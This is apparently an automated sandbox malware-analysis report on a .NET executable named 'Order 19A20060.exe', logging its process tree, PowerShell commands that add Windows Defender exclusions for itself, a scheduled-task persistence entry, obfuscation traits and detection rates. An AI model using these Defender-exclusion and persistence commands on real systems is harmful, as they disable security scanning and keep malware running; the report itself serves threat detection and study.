                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile created: C:\Users\user\AppData\Local\Temp\tmp514A.tmpJump to behavior
                        Source: Order 19A20060.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Order 19A20060.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Order 19A20060.exeReversingLabs: Detection: 68%
                        Source: Order 19A20060.exeVirustotal: Detection: 37%
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile read: C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmpJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Order 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Order 19A20060.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Order 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: TBIu.pdbSHA2569 source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr
                        Source: Binary string: TBIu.pdb source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr

                        Data Obfuscation

                        Source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, fJ.cs | .Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: Order 19A20060.exe, Login.cs | .Net Code: InitializeComponent contains xor as well as GetObject
                        Source: SgJzugoOJvLgL.exe.0.dr, Login.cs | .Net Code: InitializeComponent contains xor as well as GetObject
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.cs | .Net Code: mVmkVbjVmD System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.cs | .Net Code: mVmkVbjVmD System.Reflection.Assembly.Load(byte[])
                        Source: Order 19A20060.exe | Static PE information: 0xC0ACD5FF [Tue Jun 7 19:14:07 2072 UTC]
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A30799 push ss; iretd 0_2_07A3079A
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A307E3 push ss; iretd 0_2_07A307EA
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A307E0 push ss; iretd 0_2_07A307E2
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A33CCB push eax; iretd 0_2_07A33CCE
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A348B7 pushad ; ret 0_2_07A348BE
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A34881 pushfd ; ret 0_2_07A34882
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A30819 push ss; iretd 0_2_07A3081A
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 0_2_07A830B8 push esp; iretd 0_2_07A830B9
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 8_2_013D0C3D push edi; ret 8_2_013D0CC2
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Code function: 9_2_05683CCB push eax; iretd 9_2_05683CCE
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Code function: 9_2_056848B7 pushad ; ret 9_2_056848BE
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Code function: 9_2_05684881 pushfd ; ret 9_2_05684882
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Code function: 9_2_056D30B8 push esp; iretd 9_2_056D30B9
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Code function: 15_2_02940C3D push edi; ret 15_2_02940CC2
                        Source: Order 19A20060.exe | Static PE information: section name: .text entropy: 7.974500592117059
                        Source: SgJzugoOJvLgL.exe.0.dr | Static PE information: section name: .text entropy: 7.974500592117059
                        Source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, fJ.cs | High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, edBmslGXvQJGNrkwfA.cs | High entropy of concatenated method names: 'Rk4KREGWZe', 'xd0K4E5N7e', 'uFnKIEIgMZ', 'QSLKxDV1JZ', 'jxDKWLQ7mM', 'bw2K3MheMQ', 'pM6KnEa1kH', 'Wx6KCLhEcc', 'z1NKGMBnDa', 'VZLKLE42uH'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, hnSKDgPdxxREZ6uQuW.cs | High entropy of concatenated method names: 'Lb1K6EEUtG', 'XiTKwAXnry', 'kowKvXLaix', 'o2QKA03ALA', 'wIYKS8mOSy', 'x81KlvE3rB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, NHB3Ex1kT7YT8HRPfM.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kcNmg9BH17', 'y8rmD6wViK', 'vc7mzAlsFL', 'hesO5feMWN', 'rJgOa9gdjU', 'iZPOmwtEm2', 'iAIOOridGD', 'eMjAI8OBbaCIiSHkOi7'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, fAVKuvuFTK59FdWbkg.cs | High entropy of concatenated method names: 'BMeWHdyW6K', 'pMhW4x0yG8', 'vCKWxpdHbF', 'OiGW3Oqu2V', 'J3bWnd0tds', 'hCAxNRlewC', 'GmAx9Ubv1B', 'QFqxMpsDsm', 'WZJx21gmJm', 'tnwxgPGaH3'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, Fk1LKsKMFn2wWBa1gds.cs | High entropy of concatenated method names: 'qxSj0ZSWhT', 'iI7jZdlUlQ', 'xNMjVL3ANc', 'ah0jBHfhEm', 'BWMjPDMHXM', 'yAjjJW8WSm', 'O2RjQFiEao', 'iXbjFIPvKA', 'kUQjb9Mg3R', 'pj6jUagLDs'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, iJCoYiaJAT8kNOyDMw.cs | High entropy of concatenated method names: 'BEZyFV6ScL', 'dLKybZiHOT', 'vyPy6OUYUY', 'Jg3yw5O6X3', 'FaEyAIcTec', 'p4Qyl68ppP', 'oxNyrxHktm', 'KlWypTn8mg', 'njSyhBuqpK', 'Fh2yfhFwEc'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, NVCjVwCBo2qT0rJYOq.cs | High entropy of concatenated method names: 'N7VxP8Tefe', 'yQjxQYEvny', 'faBIvjOXXS', 'y7qIANWBLE', 'hyLIllW1Sb', 'DjwIXeU355', 'oowIrlkBci', 'zdSIp5fCxP', 'GPkI1K0E8Y', 'wYfIhOno5M'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, PLYi7NqDAj7tKXD9fM.cs | High entropy of concatenated method names: 'uYI30U1XL6', 'UE53Z25NTl', 'kew3VUHn4l', 'fc13B4iLE4', 'yaY3PlyYCI', 'kqp3JQ3pfM', 'KlV3QVGpO4', 'f203FEJpvn', 'v923bQNrff', 'ADJ3Ulwbll'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, dhgBtnNpaPi78GpYtK.cs | High entropy of concatenated method names: 'Dispose', 'Y8AagaCoEr', 'FjVmwuMcX6', 'yt8YYyYMUN', 'axuaDaxfXr', 'CNZazh7suP', 'ProcessDialogKey', 'I5hm5HmRAm', 'zHnmaTQa4I', 'MvFmmlXgDb'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, SbQEYZeNKpsZUcDnfO.cs | High entropy of concatenated method names: 'b97a34YDso', 'm5danEjfAM', 'uYxaG044iN', 'OdoaLZ0yl5', 'BpIa89fCFB', 'dssasOFmsc', 'kcae0nS6LXh3Y8F0ND', 'Lwua5pbfBxoU5uivQW', 'YwPaa5Pfe8', 'uNhaOZ2yrW'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, OFjfvMK318xsG41tlLV.cs | High entropy of concatenated method names: 'iVKq0mdLyk', 'RHGqZ9utmA', 'pRaqV4UHjp', 'IlQCiFyxbf4oN5yOF61', 'WmYlW7yhkg6UhCUXq0Z', 'cwdREmyalhF6cKPwnS8', 'YnMlBwyG3PGd60ZTbVH'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, LaZPtv2pWN66FdMorM.cs | High entropy of concatenated method names: 'egM4Sh0qFP', 'Gfx4Twirgs', 'MK24eFtDLs', 'SlD4ECpHme', 'Huy4NlLAY9', 'oFx49yNpno', 'S014MrQ4eh', 'ouV42kg2Un', 'GWW4g73vcL', 'B0G4D02TV6'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.cs | High entropy of concatenated method names: 'AePOHZyd4i', 'gRKORSLv2e', 'teBO4rikg7', 'EaGOI7W0bf', 'OTbOxPYDHi', 'zKPOWoaYm7', 'mdvO3qer9v', 'sAVOngnild', 'er1OCR2RuK', 'GXSOG2Z7aK'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, yYvJGqUhfFf5jWgkiM.cs | High entropy of concatenated method names: 'UFPIBfdKxG', 'FqqIJnZvTe', 'v1XIF3t4Nn', 'QjlIbTWpC8', 'suPI8D7g7L', 'fjpIss9B9u', 'MXTI7Rh4j0', 'piZIKg6Lwj', 'QKeIjFaKAe', 'q0CIqWNNrl'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, ENxRiUKwBLEuVCntRbw.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mqrqSu1DR9', 'fsEqTrfoWk', 'QHVqecmpHj', 'KpfqEsgC86', 'kpwqNaSpP6', 'mSPq9da2eF', 'Bb1qMug8SV'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, H87RftrjGG8r2FvNBF.cs | High entropy of concatenated method names: 'r1RjacZnWC', 'feOjOJvVEx', 'dVQjkMgOb2', 'L8CjR6yFMO', 'rVhj4IeBbp', 'jGsjxopWHy', 'RuhjWBIsos', 'oyaKMqcfUd', 'bT0K2SXVbr', 'rQ3KgrNoSq'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, Vg5x4uBd0QJ3iVm1AV.cs | High entropy of concatenated method names: 'KEj7GHR4kO', 'gPd7LkofjD', 'ToString', 'qiI7Rsr2wA', 'BDn74Vxnfl', 'cke7Iq1P6o', 'aEo7xYK3vO', 'xF97W9QwBA', 'B7r73Ixpyx', 'kCq7nprQWN'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, QXW51sL4EjyLUYOJjf.cs | High entropy of concatenated method names: 'ToString', 'StRsfBXadc', 'sCXswwAdZH', 'z5GsvZ6Kmp', 'pwMsASq2Pg', 'oraslBX3fU', 'CVLsXNTK89', 'tccsreZTaC', 'oBSspMGRu9', 'mlns1oXf2O'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, s8RL864bc3Zg1rQIYm.cs | High entropy of concatenated method names: 'Emb3RUPpSi', 'u4r3IlnetD', 'CtF3Wm7eFA', 'LZ1WDNNQYw', 'fGAWzUuOw4', 'lgB35XgPur', 'VUS3aRg7s7', 'NSk3mmZHqF', 'jNT3OVAoSN', 'o2Q3kUMEwC'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, hUhcmy3lEZX7p7rkKR.cs | High entropy of concatenated method names: 'AgnVxEBTl', 'PacBoDx1i', 'Id1JO5eZv', 'bxMQoj5I2', 'hyQb5FDZH', 'zrtUoKuiu', 'Mf9AmFLbOsXvMEeqK0', 'AysysWE93pfTB1pmdD', 'lEkK4cnHg', 'zG3qJXJ3d'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, k8FlRTXGa11THocf7O.cs | High entropy of concatenated method names: 'IdH72Njrbe', 'clk7DJiHce', 'NdwK5NTm7B', 'tMNKarodt0', 'Yjm7f8Gmfr', 'CYB7cmpv1f', 'ArD7dV8QM6', 'lCK7SwOFYp', 'krD7TSJFP9', 'DrV7e2fBL2'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, edBmslGXvQJGNrkwfA.cs | High entropy of concatenated method names: 'Rk4KREGWZe', 'xd0K4E5N7e', 'uFnKIEIgMZ', 'QSLKxDV1JZ', 'jxDKWLQ7mM', 'bw2K3MheMQ', 'pM6KnEa1kH', 'Wx6KCLhEcc', 'z1NKGMBnDa', 'VZLKLE42uH'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, hnSKDgPdxxREZ6uQuW.cs | High entropy of concatenated method names: 'Lb1K6EEUtG', 'XiTKwAXnry', 'kowKvXLaix', 'o2QKA03ALA', 'wIYKS8mOSy', 'x81KlvE3rB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, NHB3Ex1kT7YT8HRPfM.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kcNmg9BH17', 'y8rmD6wViK', 'vc7mzAlsFL', 'hesO5feMWN', 'rJgOa9gdjU', 'iZPOmwtEm2', 'iAIOOridGD', 'eMjAI8OBbaCIiSHkOi7'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, fAVKuvuFTK59FdWbkg.cs | High entropy of concatenated method names: 'BMeWHdyW6K', 'pMhW4x0yG8', 'vCKWxpdHbF', 'OiGW3Oqu2V', 'J3bWnd0tds', 'hCAxNRlewC', 'GmAx9Ubv1B', 'QFqxMpsDsm', 'WZJx21gmJm', 'tnwxgPGaH3'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, Fk1LKsKMFn2wWBa1gds.cs | High entropy of concatenated method names: 'qxSj0ZSWhT', 'iI7jZdlUlQ', 'xNMjVL3ANc', 'ah0jBHfhEm', 'BWMjPDMHXM', 'yAjjJW8WSm', 'O2RjQFiEao', 'iXbjFIPvKA', 'kUQjb9Mg3R', 'pj6jUagLDs'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, iJCoYiaJAT8kNOyDMw.cs | High entropy of concatenated method names: 'BEZyFV6ScL', 'dLKybZiHOT', 'vyPy6OUYUY', 'Jg3yw5O6X3', 'FaEyAIcTec', 'p4Qyl68ppP', 'oxNyrxHktm', 'KlWypTn8mg', 'njSyhBuqpK', 'Fh2yfhFwEc'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, NVCjVwCBo2qT0rJYOq.cs | High entropy of concatenated method names: 'N7VxP8Tefe', 'yQjxQYEvny', 'faBIvjOXXS', 'y7qIANWBLE', 'hyLIllW1Sb', 'DjwIXeU355', 'oowIrlkBci', 'zdSIp5fCxP', 'GPkI1K0E8Y', 'wYfIhOno5M'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, PLYi7NqDAj7tKXD9fM.cs | High entropy of concatenated method names: 'uYI30U1XL6', 'UE53Z25NTl', 'kew3VUHn4l', 'fc13B4iLE4', 'yaY3PlyYCI', 'kqp3JQ3pfM', 'KlV3QVGpO4', 'f203FEJpvn', 'v923bQNrff', 'ADJ3Ulwbll'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, dhgBtnNpaPi78GpYtK.cs | High entropy of concatenated method names: 'Dispose', 'Y8AagaCoEr', 'FjVmwuMcX6', 'yt8YYyYMUN', 'axuaDaxfXr', 'CNZazh7suP', 'ProcessDialogKey', 'I5hm5HmRAm', 'zHnmaTQa4I', 'MvFmmlXgDb'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, SbQEYZeNKpsZUcDnfO.cs | High entropy of concatenated method names: 'b97a34YDso', 'm5danEjfAM', 'uYxaG044iN', 'OdoaLZ0yl5', 'BpIa89fCFB', 'dssasOFmsc', 'kcae0nS6LXh3Y8F0ND', 'Lwua5pbfBxoU5uivQW', 'YwPaa5Pfe8', 'uNhaOZ2yrW'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, OFjfvMK318xsG41tlLV.csHigh entropy of concatenated method names: 'iVKq0mdLyk', 'RHGqZ9utmA', 'pRaqV4UHjp', 'IlQCiFyxbf4oN5yOF61', 'WmYlW7yhkg6UhCUXq0Z', 'cwdREmyalhF6cKPwnS8', 'YnMlBwyG3PGd60ZTbVH'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, LaZPtv2pWN66FdMorM.csHigh entropy of concatenated method names: 'egM4Sh0qFP', 'Gfx4Twirgs', 'MK24eFtDLs', 'SlD4ECpHme', 'Huy4NlLAY9', 'oFx49yNpno', 'S014MrQ4eh', 'ouV42kg2Un', 'GWW4g73vcL', 'B0G4D02TV6'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csHigh entropy of concatenated method names: 'AePOHZyd4i', 'gRKORSLv2e', 'teBO4rikg7', 'EaGOI7W0bf', 'OTbOxPYDHi', 'zKPOWoaYm7', 'mdvO3qer9v', 'sAVOngnild', 'er1OCR2RuK', 'GXSOG2Z7aK'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, yYvJGqUhfFf5jWgkiM.csHigh entropy of concatenated method names: 'UFPIBfdKxG', 'FqqIJnZvTe', 'v1XIF3t4Nn', 'QjlIbTWpC8', 'suPI8D7g7L', 'fjpIss9B9u', 'MXTI7Rh4j0', 'piZIKg6Lwj', 'QKeIjFaKAe', 'q0CIqWNNrl'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, ENxRiUKwBLEuVCntRbw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mqrqSu1DR9', 'fsEqTrfoWk', 'QHVqecmpHj', 'KpfqEsgC86', 'kpwqNaSpP6', 'mSPq9da2eF', 'Bb1qMug8SV'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, H87RftrjGG8r2FvNBF.csHigh entropy of concatenated method names: 'r1RjacZnWC', 'feOjOJvVEx', 'dVQjkMgOb2', 'L8CjR6yFMO', 'rVhj4IeBbp', 'jGsjxopWHy', 'RuhjWBIsos', 'oyaKMqcfUd', 'bT0K2SXVbr', 'rQ3KgrNoSq'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, Vg5x4uBd0QJ3iVm1AV.csHigh entropy of concatenated method names: 'KEj7GHR4kO', 'gPd7LkofjD', 'ToString', 'qiI7Rsr2wA', 'BDn74Vxnfl', 'cke7Iq1P6o', 'aEo7xYK3vO', 'xF97W9QwBA', 'B7r73Ixpyx', 'kCq7nprQWN'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, QXW51sL4EjyLUYOJjf.csHigh entropy of concatenated method names: 'ToString', 'StRsfBXadc', 'sCXswwAdZH', 'z5GsvZ6Kmp', 'pwMsASq2Pg', 'oraslBX3fU', 'CVLsXNTK89', 'tccsreZTaC', 'oBSspMGRu9', 'mlns1oXf2O'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, s8RL864bc3Zg1rQIYm.csHigh entropy of concatenated method names: 'Emb3RUPpSi', 'u4r3IlnetD', 'CtF3Wm7eFA', 'LZ1WDNNQYw', 'fGAWzUuOw4', 'lgB35XgPur', 'VUS3aRg7s7', 'NSk3mmZHqF', 'jNT3OVAoSN', 'o2Q3kUMEwC'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, hUhcmy3lEZX7p7rkKR.csHigh entropy of concatenated method names: 'AgnVxEBTl', 'PacBoDx1i', 'Id1JO5eZv', 'bxMQoj5I2', 'hyQb5FDZH', 'zrtUoKuiu', 'Mf9AmFLbOsXvMEeqK0', 'AysysWE93pfTB1pmdD', 'lEkK4cnHg', 'zG3qJXJ3d'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, k8FlRTXGa11THocf7O.csHigh entropy of concatenated method names: 'IdH72Njrbe', 'clk7DJiHce', 'NdwK5NTm7B', 'tMNKarodt0', 'Yjm7f8Gmfr', 'CYB7cmpv1f', 'ArD7dV8QM6', 'lCK7SwOFYp', 'krD7TSJFP9', 'DrV7e2fBL2'
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to dropped file

                        Boot Survival

                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
